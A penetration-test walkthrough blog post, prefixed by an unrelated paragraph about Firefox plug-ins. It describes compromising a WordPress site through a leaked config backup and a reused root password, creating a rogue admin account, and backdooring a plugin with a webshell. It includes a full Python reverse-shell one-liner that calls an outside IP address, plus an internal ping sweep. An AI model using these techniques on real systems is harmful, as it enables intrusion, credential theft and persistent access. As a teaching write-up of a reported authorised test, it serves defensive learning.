
Firefox plug-ins

Firefox plug-ins

Firefox has a 35% user rating. With plugins such as these, security engineers can find it convenience in performing their tasks. Testing and gathering information is made easier with these add-ons. We encourage you to download these plug-ins to try it out yourself.

Source: http://resources.infosecinstitute.com/firefox-plug-ins-that-a-security-engineer-need-to-know/

Elsewhere, Click here to have a look at another cool post about Dridex malware.

PIVOTING TO THE INTERNAL NETWORK

Several months back, I ran a penetration test on WordPress. It was a generic web application security assessment. However, in this instance, I was managed to compromise the server and most importantly, to do pivoting through the internal network. I figured out I’d take the compromise walk-through and turn it into a blog post for you guys today. And so, let’s do this.

Although I ran several vulnerability scanners including Nessus, OpenVAS and HP Web Inspect against the target website during the penetration test, it was Acunetix that gave me the vulnerability that would become the proverbial first domino. What a cute little gem.

COMPROMISING WORDPRESS

The scanner found a wp_config file which is usually not viewable externally. Probably, there was an issue while the developer or system administrator was working on the server. Maybe, he or she got disconnected from the server while editing the file and that caused the text editor (vi for example) to create a backup file called wp_config~ Wow – can you believe the scanner even found this?

Step 1: Running the Acunetix vulnerability scanner

PIVOTING

Additionally, the Acunetix web vulnerability scanner identified the backup of a configuration file that contained database passwords located at http://www.targetcompany.com/blog/wp-config.php~

// ** MySQL settings – You can get this info from your web host ** //

/** The name of the database for WordPress */

define(‘DB_NAME’, ‘targetcompany_blog’);

/** MySQL database username */

define(‘DB_USER’, ‘targetcompanywp’);

/** MySQL database password */

define(‘DB_PASSWORD’, ‘weakpassword123’);

Step 2: Database port is not remotely accessible so look for phpMyAdmin

Although I had database credentials, I had noticed in my scan data from the other vulnerability scanners that the target server w/as behind a Cisco ASA Firewall and the database port 3306 was not externally accessible. As a result, I couldn’t connect to the database directly because of the firewall not allowing access to the MySQL database port 3306.

It’s very common for webmasters to use a web-based tool such as phpMyAdmin to administer the database. Luckily for me, the target-company is running phpMyAdmin. Since I have database passwords, I guessed that the password for the target-company wp account which was weakpassword123 could also be the same password for the database administrative level account named root, and I was correct – it worked!

Access to the phpMyAdmin page is here:

http://targetcompany.com/phpmyadmin/

PIVOTING

Step 3: Credentials worked

The password weakpassword123 worked for the root account, and thus, I successfully logged in to phpMyAdmin.

PIVOTING

Step 4: View all of the databases on the server

Here I see the names of the other databases on the server.

· targetcompany

· targetcompany_blog

· white_papers

PIVOTING

Step 5: View the users and their respective privilege levels

Next, I have moved on to the privileges tab to see what level of privileges that each user has. I hit the jackpot by being the root user. Most of all, I have ‘ALL PRIVILEGES’

PIVOTING

 

Step 6: I can export all of the databases

If the goal of the attacker is to steal as much as possible, then the export option would, therefore, be the best way to go.

NOTE: This export option did NOT get executed in this engagement. Remember guys – we are pentesters – NOT hackers. As a result, the last thing you want to do as a pentester is actually to possess a customer’s business critical data. Proving you can access data is one thing, but staying on the safe side and just proving that you can get there – that’s usually all a customer needs to see to be happy with your work.

PIVOTING

Step 7: Usernames and passwords

Afterward, I switched to the user’s table in the target-company database. Here, I see that the passwords for ALL of the customers are stored in clear text. Under those circumstances, I had to let the client know that is not a good idea.

PIVOTING

 

..and more usernames and passwords

PIVOTING

again, more usernames and passwords

PIVOTING

and again more usernames and passwords

PIVOTING

 

Step 8: Looking at the MySQL database

I switched to the user table in the MySQL database. I see here that WordPress has hashed passwords. The database has hashed passwords too.

PIVOTING

 

 

Step 9: Attacking WordPress

I switched to the wp_users table in the target-company_blog database. I see here that WordPress has properly hashed and salted passwords.

PIVOTING

 

Step 10: Create a privileged account in WordPress

Here I am creating a privileged account named joe_strategicsec in WordPress. Creating the account is a multi-step process which you will see in the following screenshots.

PIVOTING

After filling out the menu items required to the create the account you’ll see the SQL statement execution.

PIVOTING

 

Then after filling out the meta_key field menu item ‘wp_capabilities’ required to set the privilege level of the account you just created then you’ll see the SQL statement execution.

PIVOTING

 

PIVOTING

 

After filling out the next meta_key field menu item ‘wp_user_level’ required to set the privilege level of the account you just created then you’ll see the SQL statement execution.

PIVOTING

 

PIVOTING

 

Step 11: Leveraging WordPress access

I can now see the joe_strategicsec account that gets created in the WordPress database. Ok, well it is covered in red but just trust me it’s there.

PIVOTING

Step 12: Login to the newly created WordPress account

PIVOTING

I have logged in as user joe_strategicsec, so I can now see WordPress Dashboard.

Step 13: WordPress Users

Here I view the WordPress users

PIVOTING

 

Step 14: Backdooring a WordPress plugin

I quickly switch to the plugins section and back door the Akismet plugin by replacing the source code of one of the pages with a PHP webshell.  The code for a website is pretty easy – it’s just a few lines of PHP.

PIVOTING

 

Step 15: Accessing the webshell

One can find the WordPress plugin that got converted to a webshell at:

https://www.targetcompany.com/blog/wp-content/plugins/akismet/akismet.php

To get the Linux server’s internal IP address, you can execute the command:

/sbin/ifconfig

PIVOTING

 

To get the Linux server’s version you can execute the command:

cat /etc/issue

PIVOTING

To get the Linux server’s kernel version you can execute the command:

uname –a

PIVOTING

 

Step 16: Use Python to create a reverse shell

Executing system commands via a webshell is often required when attacking web servers, but a real command shell is the preferred access method. Since the target web server is behind a Cisco firewall, I cannot connect to the server directly. I must make the server connect to me since outbound firewall rules are often less restrictive than inbound firewall rules.

Inside of the webshell I can use python to create a reverse connecting network socket that encapsulates the Linux command shell. I do this by typing the following syntax into the webshell (yes I know that there there is no screenshot, but in the webshell just type the following line of python):

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“54.186.248.116”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Now, you’ll see in the screenshot below that I have a netcat listener that receives a connection from the compromised server.

PIVOTING

 

Here you’ll see that I do a /sbin/ifconfig and the host has a 192.168 address, so I know that this box is on an internal network.

PIVOTING

 

PIVOTING TO THE INTERNAL NETWORK

Step 17: Attack the internal network

Next, I prove that I can attack the internal network with a command-line ping sweep. Since there was no Nmap installed, I wrote a quick for loop to ping the entire subnet.

PIVOTING

 

 

Step 18: No Nmap installed so went for a command-line ping sweep

PIVOTING

At this point, I opted to end this portion of the engagement and notify the client that no further exploitation is required. It would only be a matter of time to achieve root access on this server via local privilege escalation, then install more hacking tools and pivot further into the internal network.

I hope that you like this blog post, and I do apologize for the pictures being fuzzy, but I had to take them out of a pentest document and sanitize them. I decided to write this blog post because I thought it would be a good example of the kinds of things that I’ll be covering in the new Pentester Lab Network when I hope that you will check out.